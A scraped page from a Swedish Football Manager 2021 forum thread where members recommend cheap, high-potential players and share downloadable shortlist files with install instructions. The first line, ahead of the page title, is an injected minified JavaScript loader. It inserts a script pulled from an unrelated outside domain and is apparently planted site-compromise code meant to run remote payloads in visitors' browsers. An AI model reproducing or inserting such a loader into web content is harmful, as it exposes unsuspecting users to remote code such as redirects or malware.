;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Spelartips – Sida 2 – Football Manager 2021 – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[Klistrad] Spelartips

38 Inlägg
21 Users
18 Reactions
4,597 Visningar
(@briko6)
New Member

Har ni några bra tips på spelare med rikiga hästsparkar till långskott, prisklass spelar ingen roll,

tycker det är fint å vissa matcher när man kör fast eller mot lågt stående försvar

Till allsvenskan i FM20 var ex Stevie Mallan rikigt bra, 

kom gärna med massor av förslag 🙂

SvaraCitera
(@nillie)
Active Member

Postad av: @briko6

Har ni några bra tips på spelare med rikiga hästsparkar till långskott, prisklass spelar ingen roll,

tycker det är fint å vissa matcher när man kör fast eller mot lågt stående försvar

Till allsvenskan i FM20 var ex Stevie Mallan rikigt bra, 

kom gärna med massor av förslag 🙂

Hampus Söderström i Ettan norra har 16 i långskott på spelet. Går att få loss för några tusen kr. 

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@nillie

Är det samma kille som ryktades till Championship irl? 

SvaraCitera
(@nillie)
Active Member

@zxc

yes.

SvaraCitera
(@vhems)
New Member

Min första save på FM21 och är nu långt gången på min andra säsong med IFK Norrköping och har vunnit Svenska Cupen båda åren, kvalat in till EL och åkt i åttondelen första året, förlorade AS i sista matchen efter förlust mot Hammarby som vann första säsongen men leder nu AS stort efter 20 omgångar andra säsongen. Det jag främst spelar FM för är för att hitta och utveckla talanger, men även hitta bra "färdiga" spelare som passar bra in. Här kommer ett stort spelartips:

Sverige:
Lucas Forsberg, HB/VB, Sollentuna (Nyligen klar för AIK irl) - Ett måsteköp för vilket Allsvenskt lag som helst.
Andre Picornell, MV, BP - Använt som andramålvakt men kommer ta över som förstamålvakt kommande tredjesäsong.
Axel Wallenborg, VB, DIF - Kostar lite mer men blir nog Sveriges bästa ytterback längre fram i spelet.
Johan Bengtsson, Ytter, Sundsvall - Inte lyckats få ännu men ligger högt på önskelistan.
Williot Swedberg, MC, HIF - Utlånad första två säsongerna men ligger högt på önskelistan efter det.
Hussein Ali, HB, Örebro - Nu valde jag Forsberg istället pga priset men Ali blir bättre.
Alexander Milosevic - Gratis i början.
Astrit Ajdarevic - Gratis i början.

Afrikanska måsteköp:
Asanele Velebhayi, OM, Cape Town - Kostar knappt någonting (går att få gratis en halv säsong in) och utvecklas till en riktig klasspelare, egentligen alldeles för bra för AS.
Liam Bern, MB, Cape Town - Samma resonemang som med Velebhayi.
Ghabadino Mhango, Anf - Värvades för 1.25mkr nu värderad till över 10mkr. Har fått varit back-up till Nyman och haft målgaranti varje start.

Övriga måsteköp:
***** Jasurbek Jalollidinov, MF/HY, GRATIS - Utvecklas till en världsklasspelare några säsonger in.
Steve Mvoué, MF - Kostar lite mer men utvecklas till en världsklasspelare.
Max Normann Williamsen, MB - Kostar lite mer men utvecklas till en världsklasspelare.

Samtliga spelare går till ett Allsvenskt lag med ok löneanspråk (Norrköping i detta fall) och gör ditt lag slagkraftigt ute i Europa efter ett par säsonger alternativt ger dig en riktigt fet kassa om du säljer vidare. Problemet börjar nu istället bli att mina EPK-klassade spelare får för bra bud på sig för att nej till så jag behöver utveckla nya EPK's från ungdomslaget. Tips på hur man lyckas utveckla de bästa regensen från ungdomslaget mottages tacksamt, förbättrat rekrytering och ungdomsanläggning så hoppas på resultat där.

JDahl and Micke reacted
SvaraCitera
Daniel Olsson
(@fidodk)
Eminent Member

Vill man ha en bra ytterback i Allsvenskan kan jag dock tipsa om Victor Blixt 18år i Österlen FF.

Kör honom i Mjällby AIF och han levererar bra som wingback nu när Joel Nilsson är skadad!

Med vänlig hälsning/
Daniel

SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin

Hej alla glada!

Jag följer ju den spanska andraligan då mitt favoritlag utanför Sverige är Málaga CF. Följer även ligan lite smått i övrigt då den går att se gratis på YouTube med engelska kommentatorer. I och med detta har jag bestämt mig för att börja med ett av dom sämre lagen i serien på FM men inför det ville jag göra en önskelista med spelare som varit bra i verkliga livet. Så jag bestämde mig helt enkelt för att gå igenom omgångens lag för alla 30 omgångar som hittills är färdigspelade och gjort två önskelistor utifrån detta.

OnceIdealSegundaMD30.fmf finns här: https://ufile.io/s3a8er24

Denna lista innehåller alla 207 spelare som varit med i omgångens lag minst en gång under säsongen.

OnceIdealSegundaMD30Elite.fmf finns också här: https://ufile.io/j0qzy9xc

Denna lista innehåller alla 75 spelare som varit med i omgångens lag minst två gånger under säsongen. Jag tänker att "en gång är ingen gång". Dessa 75 spelare ingår ju givetvis i den stora listan á 207 spelare också.

Ladda ner önskelistorna och placera i C:\användare\användarnamn\Documents\Sports Interactive\Football Manager 2021\shortlists. Gå sedan till önskelista i spelet och välj "ladda önskelista".

Orkar du inte ladda ner önskelistorna har jag nedan valt ut några spelare som har friköpsklausul under 20 mn kr i spelet samt är under 30 år nedan;

trashbag tipsar

Álex Suárez, BHC, DM, Las Palmas, 6,5mn kr
Gorka Guruzeta, OMC, AC, Sabadell, 12mn kr
Paulino, OMHVC, Logroñés, 14mn kr
Luis Muñoz, BC, DM, MC, Málaga, 14mn kr
Pep Chavarría, B/YB/MV, Zaragoza, 14mn kr
Álex Muñoz, BVC, Tenerife, 16mn kr
Pathé Ciss, DM, MC, Fuenlabrada, 19mn kr
Shaq Moore, BHV, YB/M/OMH, Tenerife, 19mn kr
Edu Campabadal, B/YBH, Lugo, 19mn kr

Jag själv funderar på att starta save med CE Sabadell och värva spelare utifrån dessa önskelistor och spelare som blir uttagna i veckans/omgångens/månadens lag i spelet.

Hoppas ni ska ha nytta av önskelistorna!

This post was modified 4 år sedan 2 times by trashbag

SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin

@trashbag vilket enastående inlägg, wow!!

Nästa save jag drar igång måste bli i Spanien.

SvaraCitera
(@call_me_elvis)
Eminent Member

Sigurd Grönli AMC Tromsdalen. Kan fås för en billig penning. Grym assistkung. Fått bud på 150 milj med honom i Gif Svall. Han tackade nej och stannade kvaar hos mig.

Elanga OMV  Man Utd lånar gratis år efter år. Är direkt allsvenskans bättre OMV.

Puligmal Man Utd mc går låna till allsvenskan och superettan. Sedan värva när hans kontrakt gått ut. Fått bud på 200 milj med honom i Gif sundsvall. Han tackade nej och stannade kvar hos mig.

friggan reacted
SvaraCitera
friggan
(@friggan)
Estimable Member

@call_me_elvis

Spännmade att du också gkör med Sundsvall, precis som jag! Jag lånade Elanga en säsong faktiskt, men han var dessvärre skadad mest hela tiden.

Grönli har nog blivit värvad till Allsvenskan varje fm-save jag spelat i fm21

SvaraCitera
(@call_me_elvis)
Eminent Member

@friggan Elanga är tillsammans med Enblom och Grönli mina 3 bästa spelare år efter år. Lånar han gratis från man utd gratis år efter år är inne nu på säsong 24

SvaraCitera
Yayakolo
(@yayakolo)
Medlem

Victor Sluug och Farah Shahin blev ruggigt bra i min save med IFK Göteborg. Båda blev landslagsmän för Sverige och spottade in mål i Allsvenskan.

raca14 and Micke reacted
SvaraCitera
(@jadu84)
New Member

jag värvade en 15 årig Brasse gratis till mitt Blåvitt, joao victor, erbjuder man han provspel så kan man få han gratis han har gjort 40 mål på 25 matcher för mitt u19 lag hittills

raca14 reacted
SvaraCitera
JDahl
(@jdahl)
Active Member

@trashbag Måste man betala för att kunna ladda ner önskelistorna?

JD

SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin

@jdahl Nejdå men länkarna går ut efter en månad så jag kan behöva uppdatera dom med jämna mellanrum. Nu är dom uppdaterade!

SvaraCitera
jompaa11
(@jompaa11)
Active Member

@trashbag tjabba, jag gjorde mappen shortlists och placerade filen där men väl i spelet hittar jag inte önskelistan. Jag har startat om spelet så vet inte vad det beror på 🙂

"And all I ask is a tall ship and a star to steer her by"

SvaraCitera
FMViktor91
(@fmviktor91)
Estimable Member

@trashbag

om man ej har en mapp med shortlist?

SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin

@jompaa11

Jag kommer uppdatera listan nu efter säsongen när alla 42 ligaomgångar är spelade och lägga upp den nya listan. Får väl se om det fungerar bättre.

@fmviktor91

Då skapar man en mapp som heter shortlists och lägger in filen där.

Hoppas ha min uppdaterade lista klar senast till helgen, kanske mycket tidigare än så. Beror på hur mycket tid jag har.

SvaraCitera
Sida 2 / 2
Share: